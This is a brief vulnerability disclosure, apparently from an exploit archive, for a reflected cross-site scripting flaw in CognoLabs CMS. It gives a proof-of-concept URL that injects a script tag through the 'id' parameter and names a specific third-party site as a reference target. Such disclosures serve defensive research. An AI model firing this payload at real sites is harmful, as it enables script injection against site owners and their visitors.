# Exploit title: CognoLabs CMS - Cross Site Scripting ( XSS ) Vulnerability
#
# Date: 2018-03-18
#
# Exploit Author: Mehdi Razmjoo ( razmjoomehdi98@gmail.com )
#
# Vendor Homepage: http://cognolabs.com/
#
# Category: Web Application
#
# CWE: CWE-79
#
# Dork: -
#
# =============================
#
# Description:
#
# I discovered a XSS vulnerability in CognoLabs CMS. This vulnerability allows bad guy executes javascript commands on
# target. In this target, attacker can enter his javascript command through url. like this :
#
# http://Server/page.php?id=110"><script>alert("xss")</script>
#
#=============================
#
# Reference:
#
# http://www.nimsme.org/page.php?id=110"><script>alert("xss")</script>
#
#